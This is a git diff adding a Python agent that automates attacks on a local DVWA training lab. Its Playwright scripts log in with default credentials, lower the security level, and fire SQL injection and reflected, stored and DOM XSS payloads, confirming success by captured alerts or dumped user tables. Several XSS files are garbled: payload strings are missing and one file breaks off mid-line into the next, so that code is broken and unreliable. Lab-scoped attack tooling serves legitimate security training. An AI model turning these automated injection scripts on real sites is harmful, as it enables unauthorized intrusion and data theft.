diff --git a/docker-compose.yml b/docker-compose.yml
new file mode 100644
index 0000000..c53af4d
--- /dev/null
+++ b/docker-compose.yml
@@ -0,0 +1,9 @@
+services:
+ dvwa:
+ image: vulnerables/web-dvwa
+ container_name: dvwa
+ ports:
+ - "8080:80"
+ environment:
+ - MYSQL_PASS=password
+ restart: unless-stopped
diff --git a/requirements.txt b/requirements.txt
new file mode 100644
index 0000000..ea973c5
--- /dev/null
+++ b/requirements.txt
@@ -0,0 +1,7 @@
+openai>=1.40.0
+playwright>=1.46.0
+httpx>=0.27.0
+pydantic>=2.8.0
+tenacity>=8.2.3
+rich>=13.7.1
+python-dotenv>=1.0.1
diff --git a/screens/sqli_low.png b/screens/sqli_low.png
new file mode 100644
index 0000000..e3eaeb0
Binary files /dev/null and b/screens/sqli_low.png differ
diff --git a/screens/xss_dom_low.png b/screens/xss_dom_low.png
new file mode 100644
index 0000000..7c178a9
Binary files /dev/null and b/screens/xss_dom_low.png differ
diff --git a/screens/xss_reflected_low.png b/screens/xss_reflected_low.png
new file mode 100644
index 0000000..7cdad95
Binary files /dev/null and b/screens/xss_reflected_low.png differ
diff --git a/screens/xss_stored_low.png b/screens/xss_stored_low.png
new file mode 100644
index 0000000..c2dcddb
Binary files /dev/null and b/screens/xss_stored_low.png differ
diff --git a/src/__init__.py b/src/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/__pycache__/__init__.cpython-313.pyc b/src/__pycache__/__init__.cpython-313.pyc
new file mode 100644
index 0000000..8f305df
Binary files /dev/null and b/src/__pycache__/__init__.cpython-313.pyc differ
diff --git a/src/__pycache__/config.cpython-313.pyc b/src/__pycache__/config.cpython-313.pyc
new file mode 100644
index 0000000..30c6732
Binary files /dev/null and b/src/__pycache__/config.cpython-313.pyc differ
diff --git a/src/__pycache__/openai_client.cpython-313.pyc b/src/__pycache__/openai_client.cpython-313.pyc
new file mode 100644
index 0000000..9e801f4
Binary files /dev/null and b/src/__pycache__/openai_client.cpython-313.pyc differ
diff --git a/src/__pycache__/run.cpython-313.pyc b/src/__pycache__/run.cpython-313.pyc
new file mode 100644
index 0000000..16f6abb
Binary files /dev/null and b/src/__pycache__/run.cpython-313.pyc differ
diff --git a/src/agent/__init__.py b/src/agent/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/agent/__pycache__/__init__.cpython-313.pyc b/src/agent/__pycache__/__init__.cpython-313.pyc
new file mode 100644
index 0000000..3f60f4a
Binary files /dev/null and b/src/agent/__pycache__/__init__.cpython-313.pyc differ
diff --git a/src/agent/__pycache__/orchestrator.cpython-313.pyc b/src/agent/__pycache__/orchestrator.cpython-313.pyc
new file mode 100644
index 0000000..7052308
Binary files /dev/null and b/src/agent/__pycache__/orchestrator.cpython-313.pyc differ
diff --git a/src/agent/__pycache__/planner.cpython-313.pyc b/src/agent/__pycache__/planner.cpython-313.pyc
new file mode 100644
index 0000000..602384a
Binary files /dev/null and b/src/agent/__pycache__/planner.cpython-313.pyc differ
diff --git a/src/agent/orchestrator.py b/src/agent/orchestrator.py
new file mode 100644
index 0000000..8e497c1
--- /dev/null
+++ b/src/agent/orchestrator.py
@@ -0,0 +1,19 @@
+"""Minimal orchestrator that can call planner (GPT-5) to pick actions.
+For MVP we call hardcoded skills; planner integration is available for future loops.
+"""
+from typing import Dict, Any, Callable
+from . import planner
+from ..skills import login, xss_reflected_low, sqli_low, xss_stored_low, xss_dom_low
+
+SKILLS: Dict[str, Callable[[str], Dict[str, Any]]] = {
+ "login": lambda base: login.run(base),
+ "xss_stored_low": lambda base: xss_stored_low.run(base),
+ "xss_reflected_low": lambda base: xss_reflected_low.run(base),
+ "xss_dom_low": lambda base: xss_dom_low.run(base),
+ "sqli_low": lambda base: sqli_low.run(base),
+}
+
+def run_skill(base_url: str, skill: str) -> Dict[str, Any]:
+ if skill not in SKILLS:
+ raise KeyError(f"Unknown skill: {skill}")
+ return SKILLS[skill](base_url)
diff --git a/src/agent/planner.py b/src/agent/planner.py
new file mode 100644
index 0000000..96b5f04
--- /dev/null
+++ b/src/agent/planner.py
@@ -0,0 +1,4 @@
+from ..openai_client import plan_next_action
+
+def decide(context: dict) -> dict:
+ return plan_next_action(context)
diff --git a/src/agent/score.py b/src/agent/score.py
new file mode 100644
index 0000000..28cbae9
--- /dev/null
+++ b/src/agent/score.py
@@ -0,0 +1,26 @@
+import json, argparse
+from .agent.orchestrator import run_skill
+
+SUITE = [
+ ("xss_reflected_low", {}),
+ ("xss_stored_low", {}),
+ ("sqli_low", {}),
+ # depois: ("command_injection_low", {}), ("csrf_low", {}), ("upload_low", {})
+]
+
+def main():
+ ap = argparse.ArgumentParser()
+ ap.add_argument('--target', required=True)
+ args = ap.parse_args()
+ results = []
+ ok_count = 0
+ for skill, kwargs in SUITE:
+ res = run_skill(args.target, skill)
+ results.append((skill, res))
+ ok_count += 1 if res.get("ok") else 0
+ print(f"[{skill}] -> {'OK' if res.get('ok') else 'FAIL'}")
+ print(f"\nScore: {ok_count}/{len(SUITE)}")
+ print(json.dumps({k: v for k, v in results}, indent=2, ensure_ascii=False))
+
+if __name__ == "__main__":
+ main()
diff --git a/src/config.py b/src/config.py
new file mode 100644
index 0000000..83c7c8c
--- /dev/null
+++ b/src/config.py
@@ -0,0 +1,11 @@
+from pydantic import BaseModel
+import os
+
+class Settings(BaseModel):
+ openai_api_key: str = os.getenv("OPENAI_API_KEY", "")
+ openai_model: str = os.getenv("OPENAI_MODEL", "gpt-5")
+ allowlist_hosts: list[str] = [h.strip() for h in os.getenv("ALLOWLIST_HOSTS", "localhost,127.0.0.1,dvwa").split(",")]
+ dvwa_url_env: str = os.getenv("DVWA_URL", "").strip()
+ headless: bool = os.getenv("HEADLESS", "true").lower() == "true"
+
+settings = Settings()
diff --git a/src/detectors/__init__.py b/src/detectors/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/detectors/__pycache__/__init__.cpython-313.pyc b/src/detectors/__pycache__/__init__.cpython-313.pyc
new file mode 100644
index 0000000..b30f559
Binary files /dev/null and b/src/detectors/__pycache__/__init__.cpython-313.pyc differ
diff --git a/src/detectors/__pycache__/sql_errors.cpython-313.pyc b/src/detectors/__pycache__/sql_errors.cpython-313.pyc
new file mode 100644
index 0000000..ff05aa8
Binary files /dev/null and b/src/detectors/__pycache__/sql_errors.cpython-313.pyc differ
diff --git a/src/detectors/sql_errors.py b/src/detectors/sql_errors.py
new file mode 100644
index 0000000..c819b62
--- /dev/null
+++ b/src/detectors/sql_errors.py
@@ -0,0 +1,13 @@
+import re
+
+SQL_ERRORS = [
+ r"SQL syntax.*MySQL",
+ r"Warning: mysql_",
+ r"Unclosed quotation mark",
+ r"SQLSTATE\[HY000\]",
+ r"You have an error in your SQL syntax",
+]
+compiled = [re.compile(p, re.IGNORECASE) for p in SQL_ERRORS]
+
+def has_sql_error(text: str) -> bool:
+ return any(c.search(text) for c in compiled)
diff --git a/src/openai_client.py b/src/openai_client.py
new file mode 100644
index 0000000..14539bb
--- /dev/null
+++ b/src/openai_client.py
@@ -0,0 +1,46 @@
+from typing import Any, Dict
+from openai import OpenAI
+from .config import settings
+
+client = OpenAI(api_key=settings.openai_api_key)
+
+def plan_next_action(context: Dict[str, Any]) -> Dict[str, Any]:
+ """Ask GPT-5 for the next action using structured JSON output (no chain-of-thought)."""
+ system = (
+ "You are a safe web security agent. "
+ "Only operate on the allowlisted lab host and return STRICT JSON with the next action."
+ )
+ user = (
+ "Given this context, propose one next action as a JSON object with keys: "
+ "{'tool': 'navigate|fill_form|click|type_and_submit|wait|noop', "
+ "'target': 'url or selector', 'data': 'payload or null', 'rationale': 'short'}."
+ "\nContext:\n" + str(context)
+ )
+ resp = client.responses.create(
+ model=settings.openai_model,
+ input=[
+ {"role":"system","content":system},
+ {"role":"user","content":user},
+ ],
+ temperature=0.2,
+ top_p=0.9,
+ max_output_tokens=400,
+ response_format={ "type": "json_object" },
+ )
+ # For SDKs returning parsed JSON via output_parsed
+ try:
+ txt = resp.output_parsed
+ except Exception:
+ txt = None
+ if not txt:
+ try:
+ txt = resp.output_text
+ except Exception:
+ txt = "{}"
+ if isinstance(txt, dict):
+ return txt
+ import json
+ try:
+ return json.loads(txt)
+ except Exception:
+ return {"tool":"noop","target":"","data":None,"rationale":"fallback"}
diff --git a/src/run.py b/src/run.py
new file mode 100644
index 0000000..168a17e
--- /dev/null
+++ b/src/run.py
@@ -0,0 +1,15 @@
+import argparse, json, os
+from .config import settings
+from .agent.orchestrator import run_skill
+
+def main():
+ ap = argparse.ArgumentParser()
+ ap.add_argument('--target', required=False, default=settings.dvwa_url_env or "http://localhost:8080")
+ ap.add_argument('--skill', required=True, choices=['login','xss_reflected_low','sqli_low', 'xss_stored_low', 'xss_dom_low'])
+ args = ap.parse_args()
+
+ result = run_skill(args.target, args.skill)
+ print(json.dumps(result, indent=2, ensure_ascii=False))
+
+if __name__ == '__main__':
+ main()
diff --git a/src/skills/__init__.py b/src/skills/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/skills/__pycache__/__init__.cpython-313.pyc b/src/skills/__pycache__/__init__.cpython-313.pyc
new file mode 100644
index 0000000..6c9599f
Binary files /dev/null and b/src/skills/__pycache__/__init__.cpython-313.pyc differ
diff --git a/src/skills/__pycache__/login.cpython-313.pyc b/src/skills/__pycache__/login.cpython-313.pyc
new file mode 100644
index 0000000..3a37167
Binary files /dev/null and b/src/skills/__pycache__/login.cpython-313.pyc differ
diff --git a/src/skills/__pycache__/sqli_low.cpython-313.pyc b/src/skills/__pycache__/sqli_low.cpython-313.pyc
new file mode 100644
index 0000000..db6d9a1
Binary files /dev/null and b/src/skills/__pycache__/sqli_low.cpython-313.pyc differ
diff --git a/src/skills/__pycache__/xss_dom_low.cpython-313.pyc b/src/skills/__pycache__/xss_dom_low.cpython-313.pyc
new file mode 100644
index 0000000..889ac17
Binary files /dev/null and b/src/skills/__pycache__/xss_dom_low.cpython-313.pyc differ
diff --git a/src/skills/__pycache__/xss_reflected_low.cpython-313.pyc b/src/skills/__pycache__/xss_reflected_low.cpython-313.pyc
new file mode 100644
index 0000000..01a7469
Binary files /dev/null and b/src/skills/__pycache__/xss_reflected_low.cpython-313.pyc differ
diff --git a/src/skills/__pycache__/xss_stored_low.cpython-313.pyc b/src/skills/__pycache__/xss_stored_low.cpython-313.pyc
new file mode 100644
index 0000000..dca2de5
Binary files /dev/null and b/src/skills/__pycache__/xss_stored_low.cpython-313.pyc differ
diff --git a/src/skills/login.py b/src/skills/login.py
new file mode 100644
index 0000000..246dcdb
--- /dev/null
+++ b/src/skills/login.py
@@ -0,0 +1,12 @@
+from ..tools.browser import Browser
+
+def run(base_url: str, username: str="admin", password: str="password") -> dict:
+ """Login on DVWA (default creds)."""
+ with Browser(base_url) as b:
+ b.goto("/login.php")
+ b.fill('input[name="username"]', username)
+ b.fill('input[name="password"]', password)
+ b.click('input[type="submit"]')
+ body = b.text()
+ ok = "DVWA Security" in body or "Welcome" in body or "logout" in body.lower()
+ return {"ok": ok, "page": "home", "evidence": "contains DVWA after login" if ok else body[:500]}
diff --git a/src/skills/sqli_low.py b/src/skills/sqli_low.py
new file mode 100644
index 0000000..91862a5
--- /dev/null
+++ b/src/skills/sqli_low.py
@@ -0,0 +1,54 @@
+# agent/src/skills/sqli_low.py
+
+from ..tools.browser import Browser
+from pathlib import Path
+
+def run(base_url: str, payload: str = "1' OR '1'='1' -- ") -> dict:
+ with Browser(base_url) as b:
+ # login
+ b.goto("/login.php")
+ b.page.wait_for_selector('input[name="username"]', timeout=15000)
+ b.fill('input[name="username"]', "admin")
+ b.fill('input[name="password"]', "password")
+ b.click('input[type="submit"]')
+ b.page.wait_for_load_state("domcontentloaded")
+
+ # security low
+ try:
+ b.goto("/security.php")
+ b.page.wait_for_selector('select[name="security"]', timeout=5000)
+ b.page.select_option('select[name="security"]', 'low')
+ b.click('input[type="submit"]')
+ b.page.wait_for_load_state("domcontentloaded")
+ except Exception:
+ pass
+
+ # ir para SQLi Low
+ b.goto("/vulnerabilities/sqli/")
+ b.page.wait_for_selector('input[name="id"]', timeout=15000)
+
+ # enviar payload
+ b.fill('input[name="id"]', payload)
+ b.click('input[type="submit"]')
+ b.page.wait_for_timeout(1200)
+
+ # salvar screenshot
+ agent_dir = Path(__file__).resolve().parents[2]
+ screens_dir = agent_dir.parent / "screens"
+ screens_dir.mkdir(parents=True, exist_ok=True)
+ screenshot_path = screens_dir / "sqli_low.png"
+ b.page.screenshot(path=str(screenshot_path), full_page=True)
+
+ # analisar sucesso
+ html = b.content()
+ user_table_markers = ["First name", "Surname", "User ID", "Username"]
+ found = any(m in html for m in user_table_markers)
+
+ return {
+ "ok": found,
+ "vector": "SQLi (Low)",
+ "payload": payload,
+ "reason": "User table markers present" if found else "payload did not dump table",
+ "evidence_excerpt": html[:1200],
+ "screenshot": str(screenshot_path)
+ }
diff --git a/src/skills/xss_dom_low.py b/src/skills/xss_dom_low.py
new file mode 100644
index 0000000..b3a016c
--- /dev/null
+++ b/src/skills/xss_dom_low.py
@@ -0,0 +1,93 @@
+# agent/src/skills/xss_dom_low.py
+from pathlib import Path
+from urllib.parse import urlencode
+from ..tools.browser import Browser
+
+# payloads comuns que funcionam no DVWA DOM XSS (param "default")
+CANDIDATES = [
+ '',
+ '">',
+ '
',
+]
+
+def run(base_url: str) -> dict:
+ with Browser(base_url) as b:
+ # 1) login
+ b.goto("/login.php")
+ b.page.wait_for_selector('input[name="username"]', timeout=15000)
+ b.fill('input[name="username"]', "admin")
+ b.fill('input[name="password"]', "password")
+ b.click('input[type="submit"]')
+ b.page.wait_for_load_state("domcontentloaded")
+
+ # 2) tentar setar Security=Low (best-effort)
+ try:
+ b.goto("/security.php")
+ b.page.wait_for_selector('select[name="security"]', timeout=5000)
+ b.page.select_option('select[name="security"]', 'low')
+ if b.page.locator('input[name="seclev_submit"]').count() > 0:
+ b.click('input[name="seclev_submit"]')
+ else:
+ b.click('input[type="submit"]')
+ b.page.wait_for_load_state("domcontentloaded")
+ except Exception:
+ pass
+
+ # 3) hook para capturar alert()
+ alert = {"ok": False, "message": ""}
+ def on_dialog(d):
+ alert["ok"] = True
+ alert["message"] = d.message
+ d.accept()
+ b.page.on("dialog", on_dialog)
+
+ # 4) baseline: página “limpa”
+ b.goto("/vulnerabilities/xss_d/?default=English")
+ b.page.wait_for_selector("#main_menu", timeout=10000) # qualquer âncora estável
+ base_html = b.content()
+
+ # 5) tentar payloads via GET (?default=...)
+ for p in CANDIDATES:
+ qs = urlencode({"default": p})
+ b.goto(f"/vulnerabilities/xss_d/?{qs}")
+ b.page.wait_for_timeout(1200) # dá tempo do JS DOM executar
+
+ html = b.content()
+ raw_present = ("') -> dict:
+ with Browser(base_url) as b:
+ # login
+ b.goto("/login.php")
+ b.page.wait_for_selector('input[name="username"]', timeout=15000)
+ b.fill('input[name="username"]', "admin")
+ b.fill('input[name="password"]', "password")
+ b.click('input[type="submit"]')
+ b.page.wait_for_load_state("domcontentloaded")
+
+ # security = low (tentativa best-effort)
+ try:
+ b.goto("/security.php")
+ b.page.wait_for_selector('select[name="security"]', timeout=5000)
+ b.page.select_option('select[name="security"]', 'low')
+ b.click('input[type="submit"]')
+ b.page.wait_for_load_state("domcontentloaded")
+ except Exception:
+ pass
+
+ # ir para XSS Reflected
+ b.goto("/vulnerabilities/xss_r/")
+ b.page.wait_for_selector('input[name="name"]', timeout=15000)
+
+ # hook p/ capturar alert()
+ alert_triggered = {"ok": False, "message": ""}
+ def on_dialog(d):
+ alert_triggered["ok"] = True
+ alert_triggered["message"] = d.message
+ d.accept()
+ b.page.on("dialog", on_dialog)
+
+ # enviar payload
+ b.fill('input[name="name"]', payload)
+ b.click('input[type="submit"]')
+ b.page.wait_for_timeout(1200)
+
+ # salvar screenshot
+ agent_dir = Path(__file__).resolve().parents[2]
+ screens_dir = agent_dir.parent / "screens"
+ screens_dir.mkdir(parents=True, exist_ok=True)
+ screenshot_path = screens_dir / "xss_reflected_low.png"
+ b.page.screenshot(path=str(screenshot_path), full_page=True)
+
+ # analisar sucesso
+ html = b.content()
+ raw_present = "') -> dict:
+ with Browser(base_url) as b:
+ # 1) login
+ b.goto("/login.php")
+ b.page.wait_for_selector('input[name="username"]', timeout=15000)
+ b.fill('input[name="username"]', "admin")
+ b.fill('input[name="password"]', "password")
+ b.click('input[type="submit"]')
+ b.page.wait_for_load_state("domcontentloaded")
+
+ # 2) best-effort: Security = Low (se a tela existir)
+ try:
+ b.goto("/security.php")
+ b.page.wait_for_selector('select[name="security"]', timeout=5000)
+ b.page.select_option('select[name="security"]', 'low')
+ if b.page.locator('input[name="seclev_submit"]').count() > 0:
+ b.click('input[name="seclev_submit"]')
+ else:
+ b.click('input[type="submit"]')
+ b.page.wait_for_load_state("domcontentloaded")
+ except Exception:
+ pass
+
+ # 3) ir para XSS Stored
+ b.goto("/vulnerabilities/xss_s/")
+ b.page.wait_for_selector('input[name="txtName"]', timeout=15000)
+
+ # 4) preencher
+ b.fill('input[name="txtName"]', "pwn")
+ b.fill('textarea[name="mtxMessage"]', payload)
+
+ # 5) hook para capturar o alert()
+ alert_triggered = {"ok": False, "message": ""}
+ def on_dialog(d):
+ alert_triggered["ok"] = True
+ alert_triggered["message"] = d.message
+ d.accept()
+ b.page.on("dialog", on_dialog)
+
+ # 6) enviar
+ if b.page.locator('input[name="btnSign"]').count() > 0:
+ b.click('input[name="btnSign"]')
+ else:
+ b.click('input[type="submit"]')
+ b.page.wait_for_load_state("domcontentloaded")
+
+ # 7) aguardar potencial execução do alert
+ b.page.wait_for_timeout(1200)
+
+ # 8) salvar screenshot (pasta screens/ ao lado do projeto)
+ # base_dir = .../agent -> queremos .../screens
+ agent_dir = Path(__file__).resolve().parents[2] # .../agent
+ screens_dir = agent_dir.parent / "screens"
+ screens_dir.mkdir(parents=True, exist_ok=True)
+ screenshot_path = screens_dir / "xss_stored_low.png"
+ b.page.screenshot(path=str(screenshot_path), full_page=True)
+
+ # 9) avaliar sucesso: alert() capturado OU payload cru na página
+ html = b.content()
+ raw_present = "